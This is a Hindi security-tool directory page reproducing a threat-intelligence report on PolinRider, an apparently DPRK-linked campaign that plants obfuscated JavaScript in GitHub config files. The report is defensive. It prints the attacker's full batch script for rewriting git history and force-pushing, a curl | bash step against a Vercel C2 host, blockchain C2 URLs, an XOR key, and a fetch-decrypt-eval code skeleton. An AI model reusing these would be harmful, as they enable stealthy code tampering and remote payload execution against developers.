Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PolinRider — DPRK-लिंक्ड PolinRider आपूर्ति-श्रृंखला हमले पर तकनीकी डोजियर, जिसमें अस्पष्ट JS पेलोड इंजेक्शन, git इतिहास हेरफेर, C2 बुनियादी ढांचा, और 1,951 समझौता किए गए रिपॉजिटरी के लिए सुधार मार्गदर्शन का दस्तावेजीकरण किया गया है। | Kitploit
उपकरण/GitHubGitHub/opensourcemalware/polinrider
समझौता संकेतक (IOC) प्रबंधनOSINT (खुला स्रोत खुफिया)भेद्यता विश्लेषणकोड विश्लेषणफोरेंसिकमालवेयर विश्लेषणखतरा खुफियाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
घटना प्रतिक्रिया
चयनित संसाधन
GitHubopensourcemalware/polinrider

PolinRider

DPRK-लिंक्ड PolinRider आपूर्ति-श्रृंखला हमले पर तकनीकी डोजियर, जिसमें अस्पष्ट JS पेलोड इंजेक्शन, git इतिहास हेरफेर, C2 बुनियादी ढांचा, और 1,951 समझौता किए गए रिपॉजिटरी के लिए सुधार मार्गदर्शन का दस्तावेजीकरण किया गया है।

रिपॉजिटरी देखें
7881 महीना पहलेKitploit द्वारा समीक्षित

PolinRider: DPRK खतरा अभिनेता सैकड़ों GitHub रिपॉजिटरी में मैलवेयर इम्प्लांट करता है

PolinRider Threat Campaign

  • तारीख: 2026-03-07
  • अंतिम अपडेट: 2026-04-11 — नीचे अप्रैल 10–11 अपडेट देखें
  • गंभीरता: CRITICAL — 1,950+ सार्वजनिक रिपॉजिटरी में सक्रिय सप्लाई चेन इन्फेक्शन, TasksJacker / Contagious Interview क्लस्टर के साथ ऑपरेशनल मर्जर की पुष्टि

OpenSourceMalware टीम ने एक बड़े पैमाने पर खतरे के अभियान का पता लगाया है जो GitHub उपयोगकर्ताओं और संगठनों के रिपॉजिटरी में मैलवेयर इम्प्लांट कर रहा है। खतरा अभिनेता, PolinRider, ने सैकड़ों अद्वितीय मालिकों से संबंधित सैकड़ों सार्वजनिक GitHub रिपॉजिटरी में दुर्भावनापूर्ण अस्पष्ट JavaScript पेलोड इम्प्लांट किए हैं। इस अभियान से संबंधित सभी खतरे की रिपोर्ट देखने के लिए #polinrider का उपयोग करें, और समझौता किए गए रिपॉजिटरी की सूची के लिए इस ब्लॉग के अंत पर जाएं, जिसमें वे रिपॉजिटरी शामिल हैं जिन्हें हम तत्काल कार्रवाई के लिए प्राथमिकता देने की सलाह देते हैं। ध्यान रखें कि टैग वर्तमान डेटा प्राप्त करने का सबसे अच्छा तरीका है।

JavaScript पेलोड वास्तविक प्रोजेक्ट कॉन्फिग फ़ाइलों के अंत में जोड़ा जाता है — चुपचाप, फ़ाइल की वैध सामग्री के बाद — जिससे आकस्मिक कोड समीक्षा के दौरान इसे अनदेखा करना आसान हो जाता है। प्राथमिक संक्रमण वेक्टर एक समझौता किया गया npm पैकेज प्रतीत होता है जो इंस्टॉल या बिल्ड के दौरान निष्पादित होता है और प्रोजेक्ट रूट में कॉन्फिग फ़ाइलों में खुद को इंजेक्ट करता है। इससे भी बदतर, इस खतरा अभिनेता ने उसी तकनीक का उपयोग करके दुर्भावनापूर्ण NPM पैकेज भी बनाए हैं।

यह हमला बेहद सफल रहा है, एक समझौता किए गए ओपन सोर्स प्रोजेक्ट, Neutralinojs ने मैलवेयर को अपने सैकड़ों उपयोगकर्ताओं और योगदानकर्ताओं तक फैला दिया। Neutralinojs 8400 स्टार, 495 फोर्क और दर्जनों सक्रिय योगदानकर्ताओं वाला एक बहुत लोकप्रिय प्रोजेक्ट है। इस प्रकार के हमले की यही शक्ति है, क्योंकि खतरा केवल प्रारंभिक GitHub रिपॉजिटरी तक सीमित नहीं है, बल्कि उन सभी अन्य प्रोजेक्टों तक फैलता है जो उस ओपन सोर्स का उपयोग करते हैं।

OpenSourceMalware टीम ने इस अभियान को DPRK से जोड़ा है, और खतरा अभिनेता PolinRider, "Contagious Interview" और "TasksJacker" अभियानों से संबंधों के साथ एक ज्ञात Lazarus समूह योगदानकर्ता है।

प्रभाव आँकड़े

यह अभियान पहले प्रकाशन के बाद से नाटकीय रूप से बढ़ा है। 2026-04-11 तक, OSM टीम ने 1,047 अद्वितीय मालिकों से संबंधित 1,951 सार्वजनिक GitHub रिपॉजिटरी की पुष्टि की है जो समझौता किए गए हैं। यह मूल प्रकाशन तिथि (8 मार्च: 675 रिपॉजिटरी / 352 मालिक) के बाद से पांच हफ्तों में 2.9× वृद्धि है।

GitHub Repos Compromised


अप्रैल 10–11 अपडेट

2026-04-10 से शुरू और 2026-04-11 तक जारी एक अनुवर्ती शिकार में, OSM टीम ने कई प्रमुख निष्कर्ष निकाले:

  1. यह अभियान 5 हफ्तों में दोगुने से अधिक हो गया है। GitHub Code Search और Sourcegraph के माध्यम से क्रॉस-इंजन गणना (API की 1000-परिणाम सीमा से परे शोधन के साथ — नीचे कार्यप्रणाली देखें) ने पहले दिन हमारे v3 मास्टर में 1,556 अद्वितीय समझौता किए गए रिपॉजिटरी सामने लाए। दूसरे दिन एक राउंड-2 शिकार में npm-पैकेज-नाम पिवट्स, VS Code tasks.json / क्लाउड-प्रदाता पिवट्स, और नए खोजे गए default-configuration.vercel.app C2 उपडोमेन के माध्यम से और 215 नए रिपॉजिटरी जोड़े गए। मौजूदा affected_repos.csv कॉर्पस के खिलाफ डिडुपिंग के बाद, सही ज्ञात दायरा अब 1,951 अद्वितीय पीड़ित रिपॉजिटरी / 1,047 अद्वितीय मालिक है।

  2. एक नया वेरिएंट देखा गया है। PolinRider ने आर्किटेक्चर को संरक्षित करते हुए अपने ऑबफस्केटर के सभी अद्वितीय फिंगरप्रिंट को घुमाया है। नया वेरिएंट सिग्नेचर मार्कर Cot%3t=shtP (पहले rmcej%otb% था), शफल सीड 1111436 (पहले 2857687), द्वितीयक सीड 3896884 (पहले 2667686), और डिकोडर फंक्शन नाम MDy (पहले _$_1e42) का उपयोग करता है। यह रोटेशन प्रकाशित YARA नियम के लिए एक चोरी प्रतिक्रिया प्रतीत होता है। दोनों वेरिएंट वर्तमान में जंगली में सक्रिय हैं। नीचे देखें।

पूर्ण v3 + राउंड 2 शिकार रिपोर्ट और मास्टर TSV reports/ में हैं।


GitHub हमले का विवरण

खतरा अभिनेता चुराए गए GitHub क्रेडेंशियल का उपयोग नहीं कर रहा है। इसके बजाय, पीड़ितों को एक दुर्भावनापूर्ण VS Code एक्सटेंशन या NPM पैकेज के माध्यम से समझौता किया गया है। हम अभी तक नहीं जानते कि वह प्रारंभिक वेक्टर क्या है, लेकिन हम फोरेंसिक साक्ष्य से जानते हैं कि यह क्या करता है।

सबसे पहले होता है कि मैलवेयर स्थानीय कंप्यूटर पर एक खोज फ़ंक्शन निष्पादित करता है जो कुछ फ़ाइलों की तलाश करता है जैसे:

  • postcss.config.mjs
  • tailwind.config.js
  • eslint.config.mjs
  • next.config.mjs
  • babel.config.js
  • App.js
  • app.js

यदि इनमें से कोई फ़ाइल मिलती है, तो यह उस फ़ाइल के अंत में भारी रूप से अस्पष्ट दुर्भावनापूर्ण JavaScript कोड जोड़ देगा। इसके बाद, मैलवेयर temp_auto_push.bat नामक एक Windows बैच फ़ाइल स्थापित करता है। हम जानते हैं कि यह फ़ाइल मौजूद है और यह क्या करती है क्योंकि खतरा अभिनेताओं ने इसे सैकड़ों समझौता किए गए सर्वरों पर छोड़ दिया है जो शोधकर्ताओं को खोजने के लिए एक फिंगरप्रिंट देता है। यहाँ बैच फ़ाइल पूरी तरह से है:``` @echo off for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%Y-%%m-%%d --format=%%cd"') do set LAST_COMMIT_DATE=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%H:%%M:%%S --format=%%cd"') do set LAST_COMMIT_TIME=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%s"') do set LAST_COMMIT_TEXT=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%an"') do set USER_NAME=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%ae"') do set USER_EMAIL=%%A for /f "delims=" %%A in ('git rev-parse --abbrev-ref HEAD') do set CURRENT_BRANCH=%%A echo %LAST_COMMIT_DATE% %LAST_COMMIT_TIME% echo %LAST_COMMIT_TEXT% echo %USER_NAME% (%USER_EMAIL%) echo Branch: %CURRENT_BRANCH% set CURRENT_DATE=%date% set CURRENT_TIME=%time% date %LAST_COMMIT_DATE% time %LAST_COMMIT_TIME% echo Date temporarily changed to %LAST_COMMIT_DATE% %LAST_COMMIT_TIME% git config --local user.name %USER_NAME% git config --local user.email %USER_EMAIL% git add . git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify date %CURRENT_DATE% time %CURRENT_TIME% echo Date restored to %CURRENT_DATE% %CURRENT_TIME% and complete amend last commit! git push -uf origin %CURRENT_BRANCH% --no-verify @echo on

root@kitploit:~
### बैच फ़ाइल विश्लेषण

यह बैच फ़ाइल **सबसे हाल के git कमिट को उसके मूल टाइमस्टैम्प को बनाए रखते हुए पुनर्लिखित करती है** — प्रभावी रूप से एक संशोधित कमिट को ऐसा दिखाती है जैसे उसे कभी छुआ ही न गया हो।

#### चरण 1: अंतिम कमिट मेटाडेटा निकालें

यह पाँच बार `git log -1` चलाकर अंतिम कमिट का विवरण पर्यावरण चरों में खींचता है:

| Variable | Value captured |
|---|---|
| `LAST_COMMIT_DATE` | अंतिम कमिट की तिथि (YYYY-MM-DD) |
| `LAST_COMMIT_TIME` | अंतिम कमिट का समय (HH:MM:SS) |
| `LAST_COMMIT_TEXT` | कमिट संदेश |
| `USER_NAME` | लेखक का नाम |
| `USER_EMAIL` | लेखक का ईमेल |
| `CURRENT_BRANCH` | वर्तमान शाखा का नाम |

#### चरण 2: निकाली गई जानकारी प्रदर्शित करें

उन मानों को कंसोल पर प्रतिध्वनित (echo) करता है ताकि आगे बढ़ने से पहले आप देख सकें क्या कैप्चर किया गया।

#### चरण 3: टाइमस्टैम्प ट्रिक (मुख्य हेरफेर)

1. वर्तमान *सिस्टम* तिथि और समय को चरों में सहेजता है
2. **Windows सिस्टम घड़ी को बदलता है** ताकि वह अंतिम कमिट की तिथि और समय से मेल खाए
3. स्थानीय git `user.name` और `user.email` को मूल कमिट के लेखक से मेल खाने के लिए सेट करता है

#### चरण 4: कमिट में संशोधन करें```bat
git add .
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify

चूँकि सिस्टम क्लॉक को पीछे कर दिया गया था, git संशोधित कमिट को मूल टाइमस्टैम्प के साथ रिकॉर्ड करता है, जिससे यह इतिहास में अपरिवर्तित दिखाई देता है। --no-verify किसी भी प्री-कमिट हुक को बायपास करता है।

चरण 5: पुनर्स्थापित करें और पुश करें

  1. सिस्टम क्लॉक को वास्तविक वर्तमान दिनांक/समय पर पुनर्स्थापित करता है
  2. पुश हुक को बायपास करने के लिए -uf और --no-verify के साथ रिमोट ब्रांच पर फोर्स-पुश करता है

सरल शब्दों में

यह स्क्रिप्ट आपको अंतिम कमिट में चुपचाप बदलाव करने (फ़ाइलें जोड़ने या बदलने) की अनुमति देती है, जबकि पुनर्लिखित कमिट को पहले जैसा ही लेखक, टाइमस्टैम्प और संदेश दिखाती है। git इतिहास को देखने वाले किसी भी पर्यवेक्षक के लिए, ऐसा लगता है जैसे कमिट को कभी संशोधित नहीं किया गया था।

उल्लेखनीय विशेषताएँ

  • उन्नत विशेषाधिकारों की आवश्यकता है विंडोज सिस्टम क्लॉक को बदलने के लिए
  • फोर्स पुश (-uf) रिमोट हिस्ट्री को ओवरराइट करेगा – ब्रांच पर किसी और के लिए विनाशकारी
  • दोनों --no-verify फ़्लैग जानबूझकर किसी भी CI/CD हुक या लिंट चेक को बायपास करते हैं
  • यह मूल रूप से एक इतिहास-मिथ्याकरण उपकरण है – वैध सफाई के लिए उपयोगी, लेकिन निशान छिपाने के लिए भी उतना ही उपयोगी

लिनक्स और मैकओएस के बारे में क्या?

हम मानते हैं कि मैलवेयर में लिनक्स और मैकओएस जैसे अन्य ऑपरेटिंग सिस्टम के लिए git इतिहास को फिर से लिखने के समान कार्य हैं। वास्तव में, हमने इस बात के सबूत देखे हैं कि यह अन्य OS पर हो रहा है, लेकिन खतरे के अभिनेताओं ने स्रोत कोड में उन अन्य प्लेटफार्मों पर काम करने वाले उपकरण नहीं छोड़े हैं जैसे उन्होंने विंडोज के लिए छोड़े हैं।


अनुशंसित कार्रवाइयाँ

प्रभावित रेपो मालिकों के लिए:

  1. सभी JS कॉन्फ़िग फ़ाइलों (postcss.config.*, tailwind.config.*, eslint.config.*, next.config.*, vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, आदि) का ऑडिट करें कि export default या module.exports के बाद दिखाई देने वाली सामग्री के लिए। गैर-डिफ़ॉल्ट शाखाओं और नेस्टेड मोनोरेपो पथों (apps/*/, frontend/, client/, web/, आदि) की भी जाँच करें — कई पीड़ित केवल गहरे पथों में संक्रमित होते हैं।

सुरक्षा उपकरण / रजिस्ट्रियों के लिए:

  • स्टैटिक विश्लेषण पाइपलाइनों में मल्टी-वेरिएंट polinrider_payload YARA नियम (नीचे) जोड़ें — rmcej%otb% और Cot%3t=shtP दोनों वेरिएंट को कवर करता है।
  • उन पैकेजों को फ़्लैग करें जिनमें पोस्टइंस्टॉल स्क्रिप्ट प्रोजेक्ट रूट कॉन्फ़िग फ़ाइलों में लिखती हैं।
  • प्रभावित रेपो मालिकों को हाल ही में प्रकाशित npm पैकेजों के विरुद्ध क्रॉस-रेफरेंस करें, विशेष रूप से Tailwind / PostCSS पारिस्थितिकी तंत्र में।
  • GitHub Code Search पर निरंतर निगरानी क्वेरी के रूप में filename:temp_auto_push.bat और LAST_COMMIT_DATE LAST_COMMIT_TIME extension:bat जोड़ें।

OSM स्क्रिप्ट के साथ PolinRider की जाँच करें

हमारी टीम ने एक bash स्क्रिप्ट लिखी है जो समझौते के लिए आपके स्थानीय सिस्टम की जाँच करेगी। इस ब्लॉग पोस्ट के अंत में आप और अधिक जानकारी प्राप्त कर सकते हैं, या आप स्क्रिप्ट यहाँ देख सकते हैं यहाँ


संक्रमित फ़ाइल प्रकार

10 अप्रैल के अपडेट ने फ़ाइल-प्रकार सूची का महत्वपूर्ण रूप से विस्तार किया। मैलवेयर मूल रूप से प्रलेखित की तुलना में JS-परिवार की फ़ाइलों के एक व्यापक सेट को लक्षित करता है, और इसे .woff2 फ़ॉन्ट फ़ाइलों जैसी बाइनरी एसेट्स के अंदर भी देखा गया है। नीचे दी गई गणनाएँ 1,736 अद्वितीय रेपो के 2026-04-10 कॉर्पस को दर्शाती हैं।

postcss.config.mjs का प्रभुत्व (दोनों डेटा बिंदुओं में ~62% रेपो) प्राथमिक संक्रमण वेक्टर के रूप में PostCSS / Tailwind पारिस्थितिकी तंत्र की ओर इशारा करता रहता है। नव देखी गई प्रविष्टियाँ — vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, truffle.js, और बाइनरी .woff2 फ़ाइलें — दर्शाती हैं कि मैलवेयर ने अपनी फ़ाइल-लक्ष्यीकरण अनुमानों का विस्तार किया है या खतरे के अभिनेता विभिन्न बिल्ड टूलिंग का उपयोग करने वाले पीड़ितों तक पहुँचने के लिए कई npm-पैकेज वाहनों का उपयोग कर रहे हैं।

प्रसार-स्क्रिप्ट आर्टिफैक्ट temp_auto_push.bat 101 पीड़ित रेपो में पीछे छोड़ दिया गया है, उन मामलों में भी जहां JS पेलोड को बाद में मालिक द्वारा साफ कर दिया गया है। यह फ़ाइल पिछले समझौते के उच्चतम-विश्वास वाले संकेतकों में से एक है।


दुर्भावनापूर्ण NPM पैकेज

tailwind-mainanimation NPM Package

खतरे के अभिनेता ने कई दुर्भावनापूर्ण NPM पैकेज प्रकाशित किए हैं, जो सभी Tailwind / PostCSS से सटे उपयोगिताओं का रूप धारण करते हैं। 2026-04-11 तक, allavin और blackedward npm खातों को npm से हटा दिया गया है और उनके पैकेज मिटा दिए गए हैं, लेकिन मौजूदा पीड़ित रेपो में अभी भी निर्भरता संदर्भ हैं और (कई मामलों में) अभी भी उनकी कॉन्फ़िग फ़ाइलों में पोस्ट-इंस्टॉल-इंजेक्टेड मैलवेयर है।

11 अप्रैल की खोज ने पुष्टि की कि tailwindcss-style-animate ^1.1.6 ShoeVista फ़ेक-इंटरव्यू टेम्पलेट की प्राथमिक दुर्भावनापूर्ण निर्भरता है — 46 npm-पैकेज-पिवट हिट्स में से 34 उस टेम्पलेट के साथ उस सटीक निर्भरता के डेवलपर रीअपलोड हैं। सूची में अन्य पैकेज सहयोगी अभियानों द्वारा उपयोग किए जाते हैं (जैसे devhire-frontend क्लस्टर में tailwind-autoanimation और reactapp-6)।

npm निर्भरता ट्री के माध्यम से पिवट करने के इच्छुक अन्वेषकों को ध्यान देना चाहिए कि यह पिवट अब tailwind-mainanimation के लिए व्यवहार्य नहीं है — npm ने लाइव दुर्भावनापूर्ण रिलीज़ को हटा दिया है। इसके बजाय GitHub Code Search क्वेरीज़ "<package_name>" filename:package.json के माध्यम से पिवट करें, जो अभी भी पीड़ित रेपो में भूत संदर्भ लौटाती हैं।

NPM Packages

tailwind-autoanimation पैकेज एंट्रीपॉइंट फ़ाइल src/index.js के अंत में दुर्भावनापूर्ण JavaScript पेलोड को जोड़ने की समान सटीक तकनीक का उपयोग करता है:

NPM Payload


मैलवेयर सारांश

PolinRider एक बहु-चरणीय पेलोड प्रदान करता है, जो DPRK Beavertail मैलवेयर के एक नए संस्करण में परिणत होता है। प्रारंभिक पेलोड एक बड़े पैमाने पर समझौता करने वाला बैकडोर/इन्फोस्टीलर है जो वैध डेवलपर्स के रिपॉजिटरी में एक अस्पष्ट JavaScript पेलोड इंजेक्ट करता है। पेलोड को सामान्य कॉन्फ़िग फ़ाइलों (postcss.config.mjs, eslint.config.mjs, tailwind.config.js, आदि) में व्हाइटस्पेस पैडिंग के बाद जोड़ा जाता है ताकि बिल्ड टूल द्वारा मॉड्यूल आयात करने पर यह स्वचालित रूप से निष्पादित हो। यह एक बहु-स्तरीय स्ट्रिंग शफलिंग डीओबफस्केशन रूटीन का उपयोग करता है, अंततः रनटाइम पर अंतिम पेलोड का निर्माण और eval करता है।

OSM टीम ने अब तक घुमाए गए अद्वितीय फिंगरप्रिंट के साथ इस ओबफसकेटर के दो सक्रिय वेरिएंट देखे हैं:

  • मूल वेरिएंट (8 मार्च प्रकाशन): हस्ताक्षर ("rmcej%otb%",2857687), डीकोडर फ़ंक्शन _$_1e42, द्वितीयक बीज 2667686, इंजेक्शन मार्कर global['!'].
  • नया वेरिएंट (10 अप्रैल अपडेट): हस्ताक्षर Cot%3t=shtP, शफल बीज 1111436, डीकोडर फ़ंक्शन MDy, द्वितीयक बीज 3896884, इंजेक्शन मार्कर global['_V']='8-XXX'। समान आर्किटेक्चर, सभी अद्वितीय स्थिरांक घुमाए गए — लगभग निश्चित रूप से प्रकाशित rmcej_otb_payload YARA नियम के जवाब में एक चोरी रणनीति।

दोनों वेरिएंट समान XOR कुंजियों के साथ समान ब्लॉकचेन डेड-ड्रॉप C2 बुनियादी ढाँचे (TRON / Aptos / BSC) का उपयोग करते हैं, और दोनों वर्तमान में जंगली में सक्रिय हैं।

यह अंतिम पेलोड एक परिष्कृत ब्लॉकचेन-आधारित डेड ड्रॉप रिज़ॉल्वर है जो कमांड एंड कंट्रोल (C2) बुनियादी ढाँचे के रूप में अपरिवर्तनीय ब्लॉकचेन लेनदेन का उपयोग करता है। मैलवेयर ब्लॉकचेन खातों (TRON, Aptos, और BSC) से एन्क्रिप्टेड JavaScript पेलोड लाता है, XOR एन्क्रिप्शन का उपयोग करके उन्हें डिक्रिप्ट करता है, और eval() के माध्यम से निष्पादित करता है। यह तकनीक C2 बुनियादी ढाँचे को वस्तुतः हटाने योग्य नहीं बनाती है क्योंकि ब्लॉकचेन डेटा अपरिवर्तनीय है।


यह क्या करता है?

प्राथमिक कार्यक्षमता

  1. ब्लॉकचेन-आधारित C2 संचार

    • लेनदेन डेटा के लिए TRON ब्लॉकचेन खातों को क्वेरी करता है
    • TRON विफल होने पर Aptos ब्लॉकचेन पर वापस आ जाता है
    • Binance Smart Chain (BSC) लेनदेन क्वेरी कर सकता है
    • ब्लॉकचेन लेनदेन से एन्क्रिप्टेड JavaScript पेलोड पुनर्प्राप्त करता है
  2. पेलोड डिक्रिप्शन

    • पेलोड को डिक्रिप्ट करने के लिए हार्डकोडेड कुंजियों के साथ XOR सिफर का उपयोग करता है
    • विभिन्न चरणों/फ़ॉलबैक के लिए दो अलग-अलग XOR कुंजियाँ
  3. रिमोट कोड निष्पादन

    • डिक्रिप्टेड कोड को eval() के माध्यम से निष्पादित करता है
    • स्थिरता के लिए अलग की गई चाइल्ड प्रक्रियाएँ स्पॉन करता है
    • कोड निष्पादन बिना किसी उपयोगकर्ता सहभागिता के होता है
  4. एंटी-एनालिसिस विशेषताएँ

    • ओबफस्केशन की कई परतें (4+ परतें)
    • स्ट्रिंग एन्क्रिप्शन और वर्ण प्रतिस्थापन
    • डेड ड्रॉप रिज़ॉल्वर तकनीक (विशेषता देना कठिन)
    • अलग की गई प्रक्रिया निष्पादन (पैरेंट समाप्ति से बचता है)

मैलवेयर तकनीकी विश्लेषण

OSM टीम ने हमारे ब्लॉग में हाल के Neutralinojs समझौते पर इस मैलवेयर के लिए पूर्ण हमला श्रृंखला का वर्णन किया।

ओबफस्केशन परतें

मैलवेयर ओबफस्केशन की चार परतों का उपयोग करता है:

परत 1: बीज 2857687 के साथ वर्ण स्वैप एल्गोरिथ्म

  • डीओबफस्केट करने पर एरे मिलता है: ['r', 'object', 'm'] (require, typeof चेक, module)

परत 2: बीज 2667686 के साथ वर्ण स्वैप

  • फ़ंक्शन नाम और स्ट्रिंग स्थिरांक डीओबफस्केट करता है
  • डीकोडर फ़ंक्शन कोड प्रकट करता है

परत 3: कस्टम प्रतिस्थापन सिफर

  • विशेष कोड का उपयोग करके वर्ण मैपिंग
  • .c, .a, आदि जैसे प्लेसहोल्डर को वास्तविक वर्णों से बदलता है
  • वर्ण कोड: \, `, स्पेस, न्यूलाइन, *, ', और अधिक

परत 4: अंतिम पेलोड के लिए XOR एन्क्रिप्शन

  • ब्लॉकचेन से प्राप्त पेलोड XOR-एन्क्रिप्टेड होते हैं
  • विभिन्न चरणों के लिए दो हार्डकोडेड कुंजियाँ

नया वेरिएंट: Cot%3t=shtP

अप्रैल 2026 में OSM टीम ने PolinRider ओबफसकेटर के दूसरे सक्रिय वेरिएंट की पहचान की। आर्किटेक्चर मूल के समान है — वही 4-परत शफल-सिफर, वही ब्लॉकचेन डेड-ड्रॉप C2, वही बहु-चरणीय Beavertail दूसरा चरण — लेकिन हर अद्वितीय फिंगरप्रिंट स्ट्रिंग को घुमाया गया है, लगभग निश्चित रूप से प्रकाशित rmcej_otb_payload YARA नियम के जवाब में।

नया वेरिएंट एक अतिरिक्त इंजेक्शन मार्कर लाइन का उपयोग करता है: global['_V']='8-XXX' (जहाँ 8-XXX प्रति-इंजेक्शन संस्करण टैग है, जैसे 8-st1, 8-st2, …, 8-st59, साथ ही एक समानांतर संख्यात्मक बैच जैसे 8-413, 8-683, 8-778, 8-974)। अनुक्रमिक '8-stN' टैग OSM टीम के लिए सबसे मजबूत सबूत हैं कि खतरे के अभिनेता का टूलिंग प्रति पीड़ित को एक संख्यात्मक आईडी प्रदान करता है और इस वेरिएंट के कम से कम 59 अनुक्रमिक इंजेक्शन मौजूद हैं (कुछ अभी तक सार्वजनिक कोड खोज द्वारा अनुक्रमित नहीं किए गए हैं)।

उल्लेखनीय क्रॉस-वेरिएंट खोज

कम से कम एक रिपॉजिटरी — HassanHabibTahir/testclient — में विभिन्न फ़ाइलों में दोनों वेरिएंट के मार्कर हैं (postcss.config.mjs में rmcej%otb% और दूसरी फ़ाइल में global['_V']), यह दर्शाता है कि खतरे के अभिनेता का टूलिंग घुमाए गए ओबफसकेटर के साथ पहले से समझौता किए गए होस्ट के विरुद्ध पुन: चल रहा है। रक्षकों को यह नहीं मानना चाहिए कि एक बार साफ किया गया रेपो साफ रहेगा।

शस्त्रीकृत टेक-होम टेम्पलेट

npm-पैकेज और .vscode/tasks.json वितरण वैक्टर के अलावा, PolinRider खतरे के अभिनेता ने कम से कम दो फर्जी टेक-होम टेस्ट प्रोजेक्ट लिखे हैं जो फर्जी नौकरी-साक्षात्कार लालच (क्लासिक Contagious Interview प्लेबुक) के माध्यम से उम्मीदवारों को वितरित किए जाते हैं। ये प्रोजेक्ट टेम्पलेट दुर्भावनापूर्ण निर्भरता या tasks.json पेलोड के साथ पहले से लोड होते हैं ताकि प्रोजेक्ट को क्लोन और चलाने मात्र से संक्रमण शुरू हो जाए।

ShoeVista (Tailwind ई-कॉमर्स टेम्पलेट)

  • टेम्पलेट नाम: ShoeVista (यह भी देखा गया: shoevista, shoe-vista, Test-west-shoe, Test-002, product-catalog, mern-app, विभिन्न उम्मीदवार-नामित फ़ोर्क्स)
  • स्टैक: client/ में React फ्रंटएंड, server/ में Node/Express बैकएंड (विशिष्ट MERN टेक-होम)
  • वितरण वेक्टर: client/package.json में दुर्भावनापूर्ण npm निर्भरता "tailwindcss-style-animate": "^1.1.6"
  • Package.json name फ़ील्ड: "client" (सामान्य — ShoeVista ब्रांडिंग README / फ़ेक-कंपनी लैंडिंग पेज में है)

StakingGame (VS Code + ब्लॉकचेन ऑटोमेशन टेम्पलेट)

  • टेम्पलेट फिंगरप्रिंट: tasks.json फ़ाइल में शामिल है "projectInfo": { "name": "StakingGame", "description": "Advanced VSCode automation for multi-environment blockchain deployment.", "uuid": "e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" } — UUID सभी पीड़ितों में स्थिर है और इस टेम्पलेट का सबसे मजबूत संकेतक है
  • वितरण वेक्टर: शस्त्रीकृत .vscode/tasks.json जिसमें runOn: folderOpen curl | bash को default-configuration.vercel.app और अन्य नव खोजे गए Vercel C2 सबडोमेन के विरुद्ध निष्पादित करता है
  • देखे गए पीड़ित रेपो: 42+ प्रत्यक्ष UUID मिलान और व्यापक tasks.json उपयोग। उदाहरण: Devba/lmng-top-, wyrustaaruz/cal-eco-platform
  • थीम: एक ब्लॉकचेन / स्टेकिंग-गेम डेवलपर मूल्यांकन के रूप में स्थित; Web3 उम्मीदवारों को आकर्षित करता है

निहितार्थ

पूर्व-शस्त्रीकृत टेम्पलेट परियोजनाओं के अस्तित्व का अर्थ है:

  • अप्रमाणित भर्तीकर्ताओं से "टेक-होम टेस्ट" पूरा करने वाले डेवलपर्स एक प्राथमिक संक्रमण वेक्टर हैं। यह केवल npm पर आपूर्ति श्रृंखला हमला नहीं है; यह नौकरी बाजार पर एक सोशल-इंजीनियरिंग हमला है।
  • पीड़ित खाते पहले से समझौता किए गए डेवलपर्स नहीं हैं। वे विशेष रूप से एक परीक्षण पूरा करने के लिए बनाए गए ताज़ा उम्मीदवार खाते हैं। यह खाता आयु < 1 वर्ष वाले बड़ी संख्या में 0-स्टार / 0-फ़ोर्क पीड़ित रेपो की व्याख्या करता है।
  • पीड़ितों की तलाश करने वाले रक्षकों को अपनी खोज अनुमानों में उम्मीदवार-नामकरण पैटर्न (test-*, *-test, *-interview, *-assessment, *-task) शामिल करने चाहिए।

निष्पादन प्रवाह```

  1. Malware loads when NPM package is imported or the source code is run by Node
  2. Deobfuscates internal strings and function names
  3. Queries TRON blockchain account for latest transaction ├─ URL: https://api.trongrid.io/v1/accounts/TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP/transactions └─ Extracts transaction data containing encrypted payload
  4. If TRON fails, queries Aptos blockchain ├─ URL: https://fullnode.mainnet.aptoslabs.com/v1/accounts/0xbe037.../transactions └─ Extracts payload from transaction arguments
  5. XOR-decrypts the payload using key "2[gWfGj;<:-93Z^C"
  6. Executes decrypted code via eval()
  7. Spawns detached child process for persistence ├─ Command: node -e "" └─ Detached: true, windowsHide: true
  8. If first set fails, repeats with secondary addresses and key
root@kitploit:~
### कोड संरचना```javascript
// Simplified structure (actual code is heavily obfuscated)

async function fetchPayloadFromTron(address) {
    // Queries TRON API for account transactions
    const response = await https.get(
        `https://api.trongrid.io/v1/accounts/${address}/transactions?only_confirmed=true&only_from=true&limit=1`
    );
    // Extracts encrypted data from transaction
    return response.data[0].raw_data.data;
}

async function fetchPayloadFromAptos(txHash) {
    // Queries Aptos API for transaction details
    const response = await https.get(
        `https://fullnode.mainnet.aptoslabs.com/v1/accounts/${txHash}/transactions?limit=1`
    );
    // Extracts payload from transaction arguments
    return response[0].payload.arguments[0];
}

function xorDecrypt(encryptedData, key) {
    // XOR decryption with repeating key
    let result = '';
    for (let i = 0; i < encryptedData.length; i++) {
        const keyChar = key.charCodeAt(i % key.length);
        result += String.fromCharCode(encryptedData.charCodeAt(i) ^ keyChar);
    }
    return result;
}

// Main execution
